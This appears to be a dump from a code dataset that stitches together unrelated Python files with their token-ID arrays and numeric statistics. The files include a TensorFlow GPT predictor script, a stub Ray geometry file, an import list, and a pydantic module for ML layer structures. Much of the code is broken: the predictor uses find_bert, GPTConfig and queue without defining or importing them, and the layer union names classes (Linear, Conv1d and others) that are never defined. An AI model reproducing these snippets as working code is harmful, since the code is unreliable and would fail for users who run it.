220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 11787, 25745, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 26801, 796, 5418, 7, 16793, 11, 2116, 13, 7220, 62, 5907, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 35528, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7, 7203, 6, 4, 82, 6, 373, 407, 1043, 287, 2106, 11, 355, 257, 2393, 11, 19016, 11, 366, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 13099, 287, 262, 2836, 25745, 19570, 4064, 2496, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 318, 39098, 7, 8189, 26801, 11, 965, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2438, 26801, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 318, 39098, 7, 8189, 26801, 11, 42755, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2438, 26801, 13, 8367, 628, 220, 220, 220, 220, 220, 220, 220, 5298, 5994, 12331, 7203, 4, 82, 318, 6159, 257, 4731, 4249, 257, 15021, 526, 4064, 2496, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 26801, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 6101, 7535, 33895, 198, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 825, 379, 37023, 62, 3575, 602, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 1212, 481, 307, 10945, 379, 262, 640, 286, 8420, 13, 628, 220, 220, 220, 220, 220, 220, 220, 5985, 929, 4560, 290, 8914, 286, 16218, 1366, 326, 318, 1760, 198, 220, 220, 220, 220, 220, 220, 220, 31776, 8736, 416, 6101, 7535, 815, 307, 6157, 994, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1114, 1243, 326, 743, 4745, 319, 13693, 9701, 393, 3859, 23514, 357, 10508, 198, 220, 220, 220, 220, 220, 220, 220, 355, 1719, 1100, 1370, 393, 407, 828, 7881, 257, 4553, 379, 37023, 2163, 287, 262, 198, 220, 220, 220, 220, 220, 220, 220, 2438, 326, 468, 262, 5035, 1321, 11, 2138, 621, 2111, 284, 198, 220, 220, 220, 220, 220, 220, 220, 45343, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 13872, 262, 2106, 6246, 357, 5661, 7000, 262, 886, 640, 290, 1627, 954, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 428, 1276, 307, 1635, 19052, 9, 262, 20218, 7753, 27425, 11, 287, 1339, 286, 8584, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2106, 20613, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23569, 62, 37153, 13, 437, 62, 29891, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 5985, 929, 477, 20218, 16624, 290, 24512, 1364, 1088, 198, 220, 220, 220, 220, 220, 220, 220, 329, 256, 7753, 287, 2116, 13, 29510, 16624, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 28686, 13, 403, 8726, 7, 83, 7753, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 440, 5188, 81, 1472, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 628, 220, 220, 220, 220, 220, 220, 220, 329, 256, 15908, 287, 2116, 13, 29510, 15908, 82, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 28686, 13, 81, 9132, 343, 7, 8671, 343, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 440, 5188, 81, 1472, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 11459, 477, 2836, 3891, 43076, 284, 2650, 477, 10288, 3424, 306, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 42503, 7, 3605, 62, 29891, 28, 25101, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 5660, 2836, 26569, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 25480, 82, 13, 49625, 2902, 62, 25480, 3419, 628, 198, 220, 220, 220, 1303, 3827, 40372, 287, 12094, 47611, 284, 1487, 36454, 628, 198, 4871, 21365, 23248, 24694, 7, 4164, 330, 31172, 28, 39305, 13, 24694, 48526, 2599, 198, 220, 220, 220, 37227, 2025, 12531, 2779, 1398, 329, 21365, 23248, 526, 15931, 198, 198, 9492, 5275, 23248, 24694, 13, 30238, 7, 9492, 5275, 23248, 8, 198 ]
2.382067
54,192
import sys,os father_path = os.path.join(os.getcwd()) print(father_path, "==father path==") bert_path = find_bert(father_path) # t2t_bert_path = os.path.join(bert_path, "t2t_bert") # sys.path.extend([bert_path, t2t_bert_path]) sys.path.extend([bert_path]) print(sys.path) from predict import AppPredictor from predict.preprocessors import GPTPreprocessor from predict.postprocessors import GPTPostprocessor import tensorflow as tf from train.modeling import GroverModel, GroverConfig, sample from bunch import Bunch from predict.app_utils import get_selected_columns_schema _app_flags = tf.app.flags _app_flags.DEFINE_string("inputTable", default=None, help='Input table (only for pai cmd)') _app_flags.DEFINE_string("outputTable", default=None, help='Output table (only for pai cmd)') _app_flags.DEFINE_string("inputSchema", default=None, help='Only for csv data, the schema of input table') _app_flags.DEFINE_string("firstSequence", default=None, help='Which column is the first sequence mapping to') _app_flags.DEFINE_string("secondSequence", default=None, help='Which column is the second sequence mapping to') _app_flags.DEFINE_string("appendCols", default=None, help='Which columns will be appended on the outputs') _app_flags.DEFINE_string("outputSchema", default="pool_output,first_token_output,all_hidden_outputs", help='The choices of output features') _app_flags.DEFINE_integer("sequenceLength", default=128, help='Maximum overall sequence length.') _app_flags.DEFINE_string("modelName", default='', help='Name of pretrained model') _app_flags.DEFINE_integer("batchSize", default=32, help='Maximum overall sequence length.') _APP_FLAGS = _app_flags.FLAGS app_config = GPTConfig() predictor = AppPredictor(app_config, thread_num=1, queue_size=256, job_name="app_predictor") preprocessor = GPTPreprocessor(app_config, thread_num=predictor.thread_num, input_queue=queue.Queue(), output_queue=queue.Queue()) postprocessor = GPTPostprocessor(app_config, prediction_colname="predictions", thread_num=predictor.thread_num, input_queue=queue.Queue(), output_queue=queue.Queue()) predictor.run_predict(reader=None, preprocessor=preprocessor, postprocessor=postprocessor, writer=None)
[ 198, 11748, 25064, 11, 418, 198, 198, 11358, 62, 6978, 796, 28686, 13, 6978, 13, 22179, 7, 418, 13, 1136, 66, 16993, 28955, 198, 4798, 7, 11358, 62, 6978, 11, 366, 855, 11358, 3108, 855, 4943, 198, 198, 4835, 62, 6978, 796, 1064, 62, 4835, 7, 11358, 62, 6978, 8, 198, 2, 256, 17, 83, 62, 4835, 62, 6978, 796, 28686, 13, 6978, 13, 22179, 7, 4835, 62, 6978, 11, 366, 83, 17, 83, 62, 4835, 4943, 198, 2, 25064, 13, 6978, 13, 2302, 437, 26933, 4835, 62, 6978, 11, 256, 17, 83, 62, 4835, 62, 6978, 12962, 198, 17597, 13, 6978, 13, 2302, 437, 26933, 4835, 62, 6978, 12962, 198, 198, 4798, 7, 17597, 13, 6978, 8, 198, 198, 6738, 4331, 1330, 2034, 47, 17407, 273, 198, 6738, 4331, 13, 3866, 14681, 669, 1330, 402, 11571, 6719, 41341, 198, 6738, 4331, 13, 7353, 14681, 669, 1330, 402, 11571, 6307, 41341, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 6738, 4512, 13, 4666, 10809, 1330, 10299, 332, 17633, 11, 10299, 332, 16934, 11, 6291, 198, 6738, 7684, 1330, 347, 3316, 198, 6738, 4331, 13, 1324, 62, 26791, 1330, 651, 62, 34213, 62, 28665, 82, 62, 15952, 2611, 198, 198, 62, 1324, 62, 33152, 796, 48700, 13, 1324, 13, 33152, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 15414, 10962, 1600, 4277, 28, 14202, 11, 1037, 11639, 20560, 3084, 357, 8807, 329, 279, 1872, 23991, 8, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 22915, 10962, 1600, 4277, 28, 14202, 11, 1037, 11639, 26410, 3084, 357, 8807, 329, 279, 1872, 23991, 8, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 15414, 27054, 2611, 1600, 4277, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 10049, 329, 269, 21370, 1366, 11, 262, 32815, 286, 5128, 3084, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 11085, 44015, 594, 1600, 4277, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 13828, 5721, 318, 262, 717, 8379, 16855, 284, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 12227, 44015, 594, 1600, 4277, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 13828, 5721, 318, 262, 1218, 8379, 16855, 284, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 33295, 5216, 82, 1600, 4277, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 13828, 15180, 481, 307, 598, 1631, 319, 262, 23862, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 22915, 27054, 2611, 1600, 4277, 2625, 7742, 62, 22915, 11, 11085, 62, 30001, 62, 22915, 11, 439, 62, 30342, 62, 22915, 82, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 464, 7747, 286, 5072, 3033, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 41433, 7203, 43167, 24539, 1600, 4277, 28, 12762, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 40541, 4045, 8379, 4129, 2637, 8, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 8841, 7203, 19849, 5376, 1600, 4277, 11639, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 5376, 286, 2181, 13363, 2746, 11537, 198, 62, 1324, 62, 33152, 13, 7206, 29940, 62, 41433, 7203, 43501, 10699, 1600, 4277, 28, 2624, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 40541, 4045, 8379, 4129, 2637, 8, 198, 62, 24805, 62, 38948, 50, 796, 4808, 1324, 62, 33152, 13, 38948, 50, 198, 198, 1324, 62, 11250, 796, 402, 11571, 16934, 3419, 198, 198, 79, 17407, 273, 796, 2034, 47, 17407, 273, 7, 1324, 62, 11250, 11, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4704, 62, 22510, 28, 16, 11, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16834, 62, 7857, 28, 11645, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1693, 62, 3672, 2625, 1324, 62, 79, 17407, 273, 4943, 198, 198, 3866, 41341, 796, 402, 11571, 6719, 41341, 7, 1324, 62, 11250, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4704, 62, 22510, 28, 79, 17407, 273, 13, 16663, 62, 22510, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5128, 62, 36560, 28, 36560, 13, 34991, 22784, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5072, 62, 36560, 28, 36560, 13, 34991, 28955, 198, 7353, 41341, 796, 402, 11571, 6307, 41341, 7, 1324, 62, 11250, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17724, 62, 4033, 3672, 2625, 28764, 9278, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4704, 62, 22510, 28, 79, 17407, 273, 13, 16663, 62, 22510, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5128, 62, 36560, 28, 36560, 13, 34991, 22784, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5072, 62, 36560, 28, 36560, 13, 34991, 28955, 198, 198, 79, 17407, 273, 13, 5143, 62, 79, 17407, 7, 46862, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 41341, 28, 3866, 41341, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1281, 41341, 28, 7353, 41341, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6260, 28, 14202, 8, 198 ]
2.208703
1,241
# constrained version of a line # has direction from Line import * """ ray1 = Ray((0, 0), (0, 1)) print ray1.getBase() print ray1.getDirectionVector() ray2 = Ray((1, 1), (-1, 0)) print ray1.doesIntersectWithRay(ray2) print ray1.intersectWithRay(ray2) """
[ 2, 31070, 2196, 286, 257, 1627, 201, 198, 201, 198, 2, 468, 4571, 201, 198, 201, 198, 6738, 6910, 1330, 1635, 201, 198, 201, 198, 37811, 201, 198, 201, 198, 2433, 16, 796, 7760, 19510, 15, 11, 657, 828, 357, 15, 11, 352, 4008, 201, 198, 201, 198, 4798, 26842, 16, 13, 1136, 14881, 3419, 201, 198, 201, 198, 4798, 26842, 16, 13, 1136, 35, 4154, 38469, 3419, 201, 198, 201, 198, 2433, 17, 796, 7760, 19510, 16, 11, 352, 828, 13841, 16, 11, 657, 4008, 201, 198, 201, 198, 4798, 26842, 16, 13, 22437, 9492, 8831, 3152, 19591, 7, 2433, 17, 8, 201, 198, 201, 198, 4798, 26842, 16, 13, 3849, 8831, 3152, 19591, 7, 2433, 17, 8, 201, 198, 201, 198, 37811, 201, 198, 201, 198, 201, 198 ]
2.230769
130
import torch from torch import nn import numpy as np import pickle import os from model.VAE import VAE from data.normalization import ChallengeNormalizer from util.utils import iterate_minibatches from util.cache import load_model, save_model from config.general import cache_dir
[ 11748, 28034, 198, 6738, 28034, 1330, 299, 77, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 2298, 293, 198, 11748, 28686, 198, 198, 6738, 2746, 13, 11731, 36, 1330, 13753, 36, 198, 6738, 1366, 13, 11265, 1634, 1330, 13879, 26447, 7509, 198, 6738, 7736, 13, 26791, 1330, 11629, 378, 62, 1084, 571, 20981, 198, 6738, 7736, 13, 23870, 1330, 3440, 62, 19849, 11, 3613, 62, 19849, 198, 6738, 4566, 13, 24622, 1330, 12940, 62, 15908, 198 ]
3.697368
76
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Author: Li Yuanming Email: [email protected] Date: 1/27/2021 ML model structure definitions. """ import abc import inspect from enum import Enum from typing import Optional, Union, Tuple, Dict, OrderedDict from pydantic import BaseModel, PositiveInt, conint, PositiveFloat, Field, validator from typing_extensions import Literal class Operation(Enum): """ Operation enum to the layer or connection. There are three kinds of operations: ``'A'`` for add the specific layer / connection, ``'D'`` for delete the specific layer / connection, ``M`` for modify the layer / connection, and ``E`` for no operation. """ ADD = 'A' DELETE = 'D' MODIFY = 'M' EMPTY = 'E' class LayerType(Enum): """ Enum of the supported layer type. This is to hint which class of layer the provided data is converted to. """ LINEAR = 'torch.nn.Linear' CONV_1D = 'torch.nn.Conv1d' CONV_2D = 'torch.nn.Conv2d' RELU = 'torch.nn.ReLU' TANH = 'torch.nn.Tanh' BN_1D = 'torch.nn.BatchNorm1d' BN_2D = 'torch.nn.BatchNorm2d' MP_1D = 'torch.nn.MaxPool1d' MP_2D = 'torch.nn.MaxPool2d' AAP_1D = 'torch.nn.AdaptiveAvgPool1d' AAP_2D = 'torch.nn.AdaptiveAvgPool2d' class ModelLayer(BaseModel, abc.ABC): # noinspection PyUnresolvedReferences """ Layer of the model structure. For layer attributes need to be set :code:`None`, use :code:`'null'` instead. This is for the reason of updated parameters with value :code:`None` will be viewed as not set. So we take special care to the desired :code:`None`, replacing it with :code:`'null'`. Attributes: op_ (Operation): Operation to the layer. type_ (LayerType): Indicates the type of this layer. This field also provides hint for :class:`pydantic` model conversion. __required_type__ (LayerType): By overriding this attributes, we can use :meth:`check_layer_type` to provide validation of the sub classes. """ op_: Operation type_: LayerType __required_type__: LayerType @classmethod def parse_layer_obj(cls, layer_obj): """ Parse from a ML layer object. This function will inspect the required parameters to build the layer, and try to obtain its parameter value from the layer object. The default parameter parser is python default :code:`getattr`, which assume we can get the value from the same-named attribute of the layer object. For parameter cannot parsed with default parser, set a function with the format: :code:`__{parameter_name}_parser__(layer_obj: Any) -> Any`. Has the following signature: Input Arguments: * layer_obj : Any The layer object to be parsed. Return Arguments: * Any The parsed value of the given parameter. TODO: Signature checking for __{parameter_name}_parser__ """ kwargs = {'op_': Operation.EMPTY, 'type_': cls.__required_type__} signature = inspect.signature(layer_obj.__init__) for param in signature.parameters: parser = getattr(cls, f'__{param}_parser__', lambda obj: getattr(obj, param)) kwargs[param] = parser(layer_obj) return cls(**kwargs) @validator('type_') def check_layer_type(cls, layer_type: LayerType) -> LayerType: # noqa """ Checks layer type value provided is the same as the required value. This is to generate validator for check :code:`layer_type` field of subclasses of :class:`ModelLayer`. """ if layer_type != cls.__required_type__: raise ValueError(f'Expected {cls.__required_type__} but got {layer_type}') return layer_type _LayerType = Union[Linear, Conv1d, Conv2d, ReLU, Tanh, BatchNorm1d, BatchNorm2d, MaxPool1d, MaxPool2d, AdaptiveAvgPool1d, AdaptiveAvgPool2d] class Structure(BaseModel): # noinspection PyUnresolvedReferences """ Indicate a ML model structure using a graph data structure. :attr:`layer` is the graph node, representing a layer of the model. :attr:`connection` is the graph edge, representing which two layers are connected, and the directions of tensor pass. Attributes: layer (OrderedDict[str, _LayerType]): Layer mapping, the key is layer name, and the value is layer attributes. See :class:`ModelLayer` for reference. connection (Optional[Dict[str, Dict[str, Operation]]]): The connection (:attr:`connection`) maps the starting layer name, to the ending layer name with a connection operation. Examples:: >>> from collections import OrderedDict >>> # add a nn.Linear layer named 'fc1' with in_features=1024, out_features=10 >>> layer_mapping = OrderedDict({ ... 'fc1': LinearLayer(in_features=1024, out_features=10, type_=LayerType.LINEAR, op_=Operation.ADD), ... }) >>> # connection example for add connection from 'conv1' to 'fc1' >>> connection_mapping = {'conv1': {'fc1': Operation.ADD}} >>> struct = Structure(layer=layer_mapping, connection=connection_mapping) >>> print(struct) layer={'fc1': LinearLayer(in_features=1024, out_features=10, bias=None)} connection={'conv1': {'fc1': <Operation.ADD: 'A'>}} >>> # Other than using the model object, we can pass in a plain dictionary, ... # and utilize `Structure.parse_obj`. >>> structure_data = { ... 'layer': {'fc': {'in_features': 1024, 'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'A'}}, ... 'connection': {'conv1': {'fc1': 'A'}} ... } >>> Structure.parse_obj(structure_data) Structure(layer={'fc': LinearLayer(in_features=1024, out_features=10, bias=None)}, connection={'conv1': {'fc1': <Operation.ADD: 'A'>}}) """ layer: OrderedDict[str, _LayerType] = Field( default_factory=OrderedDict, example={'fc': {'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'M'}} ) connection: Optional[Dict[str, Dict[str, Operation]]] = Field( default_factory=dict, example={'conv1': {'fc1': 'A'}} )
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 13838, 25, 7455, 34071, 2229, 198, 15333, 25, 331, 4528, 2713, 21, 31, 68, 13, 429, 84, 13, 15532, 13, 45213, 198, 10430, 25, 352, 14, 1983, 14, 1238, 2481, 198, 198, 5805, 2746, 4645, 17336, 13, 198, 37811, 198, 11748, 450, 66, 198, 11748, 10104, 198, 6738, 33829, 1330, 2039, 388, 198, 6738, 19720, 1330, 32233, 11, 4479, 11, 309, 29291, 11, 360, 713, 11, 14230, 1068, 35, 713, 198, 198, 6738, 279, 5173, 5109, 1330, 7308, 17633, 11, 33733, 5317, 11, 369, 600, 11, 33733, 43879, 11, 7663, 11, 4938, 1352, 198, 6738, 19720, 62, 2302, 5736, 1330, 25659, 1691, 628, 198, 4871, 14680, 7, 4834, 388, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 14680, 33829, 284, 262, 7679, 393, 4637, 13, 1318, 389, 1115, 6982, 286, 4560, 25, 7559, 6, 32, 6, 15506, 329, 751, 262, 2176, 198, 220, 220, 220, 7679, 1220, 4637, 11, 7559, 6, 35, 6, 15506, 329, 12233, 262, 2176, 7679, 1220, 4637, 11, 7559, 44, 15506, 329, 13096, 262, 7679, 1220, 198, 220, 220, 220, 4637, 11, 290, 7559, 36, 15506, 329, 645, 4905, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 27841, 796, 705, 32, 6, 198, 220, 220, 220, 5550, 2538, 9328, 796, 705, 35, 6, 198, 220, 220, 220, 19164, 5064, 56, 796, 705, 44, 6, 198, 220, 220, 220, 38144, 9936, 796, 705, 36, 6, 628, 198, 4871, 34398, 6030, 7, 4834, 388, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2039, 388, 286, 262, 4855, 7679, 2099, 13, 770, 318, 284, 9254, 543, 1398, 286, 7679, 262, 2810, 1366, 318, 11513, 284, 13, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 48920, 1503, 796, 705, 13165, 354, 13, 20471, 13, 14993, 451, 6, 198, 220, 220, 220, 7102, 53, 62, 16, 35, 796, 705, 13165, 354, 13, 20471, 13, 3103, 85, 16, 67, 6, 198, 220, 220, 220, 7102, 53, 62, 17, 35, 796, 705, 13165, 354, 13, 20471, 13, 3103, 85, 17, 67, 6, 198, 220, 220, 220, 29749, 52, 796, 705, 13165, 354, 13, 20471, 13, 3041, 41596, 6, 198, 220, 220, 220, 309, 1565, 39, 796, 705, 13165, 354, 13, 20471, 13, 45557, 71, 6, 198, 220, 220, 220, 347, 45, 62, 16, 35, 796, 705, 13165, 354, 13, 20471, 13, 33, 963, 35393, 16, 67, 6, 198, 220, 220, 220, 347, 45, 62, 17, 35, 796, 705, 13165, 354, 13, 20471, 13, 33, 963, 35393, 17, 67, 6, 198, 220, 220, 220, 4904, 62, 16, 35, 796, 705, 13165, 354, 13, 20471, 13, 11518, 27201, 16, 67, 6, 198, 220, 220, 220, 4904, 62, 17, 35, 796, 705, 13165, 354, 13, 20471, 13, 11518, 27201, 17, 67, 6, 198, 220, 220, 220, 31518, 62, 16, 35, 796, 705, 13165, 354, 13, 20471, 13, 48003, 425, 48997, 27201, 16, 67, 6, 198, 220, 220, 220, 31518, 62, 17, 35, 796, 705, 13165, 354, 13, 20471, 13, 48003, 425, 48997, 27201, 17, 67, 6, 628, 198, 4871, 9104, 49925, 7, 14881, 17633, 11, 450, 66, 13, 24694, 2599, 198, 220, 220, 220, 1303, 645, 1040, 14978, 9485, 3118, 411, 5634, 19927, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 34398, 286, 262, 2746, 4645, 13, 628, 220, 220, 220, 1114, 7679, 12608, 761, 284, 307, 900, 1058, 8189, 25, 63, 14202, 47671, 779, 1058, 8189, 25, 63, 6, 8423, 6, 63, 2427, 13, 770, 318, 329, 262, 1738, 286, 198, 220, 220, 220, 6153, 10007, 351, 1988, 1058, 8189, 25, 63, 14202, 63, 481, 307, 9569, 355, 407, 900, 13, 1406, 356, 1011, 2041, 1337, 284, 262, 198, 220, 220, 220, 10348, 1058, 8189, 25, 63, 14202, 47671, 13586, 340, 351, 1058, 8189, 25, 63, 6, 8423, 6, 44646, 628, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1034, 62, 357, 32180, 2599, 14680, 284, 262, 7679, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2099, 62, 357, 49925, 6030, 2599, 1423, 16856, 262, 2099, 286, 428, 7679, 13, 770, 2214, 635, 3769, 9254, 329, 1058, 4871, 25, 63, 79, 5173, 5109, 63, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2746, 11315, 13, 198, 220, 220, 220, 220, 220, 220, 220, 11593, 35827, 62, 4906, 834, 357, 49925, 6030, 2599, 2750, 44987, 428, 12608, 11, 356, 460, 779, 1058, 76, 2788, 25, 63, 9122, 62, 29289, 62, 4906, 63, 284, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2148, 21201, 286, 262, 850, 6097, 13, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 1034, 62, 25, 14680, 198, 220, 220, 220, 2099, 62, 25, 34398, 6030, 628, 220, 220, 220, 11593, 35827, 62, 4906, 834, 25, 34398, 6030, 628, 220, 220, 220, 2488, 4871, 24396, 198, 220, 220, 220, 825, 21136, 62, 29289, 62, 26801, 7, 565, 82, 11, 7679, 62, 26801, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2547, 325, 422, 257, 10373, 7679, 2134, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2163, 481, 10104, 262, 2672, 10007, 284, 1382, 262, 7679, 11, 290, 1949, 284, 7330, 663, 198, 220, 220, 220, 220, 220, 220, 220, 11507, 1988, 422, 262, 7679, 2134, 13, 383, 4277, 11507, 30751, 318, 21015, 4277, 198, 220, 220, 220, 220, 220, 220, 220, 1058, 8189, 25, 63, 1136, 35226, 47671, 543, 7048, 356, 460, 651, 262, 1988, 422, 262, 976, 12, 13190, 11688, 286, 262, 198, 220, 220, 220, 220, 220, 220, 220, 7679, 2134, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1114, 11507, 2314, 44267, 351, 4277, 30751, 11, 900, 257, 2163, 351, 262, 5794, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1058, 8189, 25, 63, 834, 90, 17143, 2357, 62, 3672, 92, 62, 48610, 834, 7, 29289, 62, 26801, 25, 4377, 8, 4613, 4377, 44646, 198, 220, 220, 220, 220, 220, 220, 220, 7875, 262, 1708, 9877, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23412, 20559, 2886, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 7679, 62, 26801, 1058, 4377, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 7679, 2134, 284, 307, 44267, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8229, 20559, 2886, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 4377, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 44267, 1988, 286, 262, 1813, 11507, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16926, 46, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 34894, 10627, 329, 11593, 90, 17143, 2357, 62, 3672, 92, 62, 48610, 834, 198, 220, 220, 220, 220, 220, 220, 220, 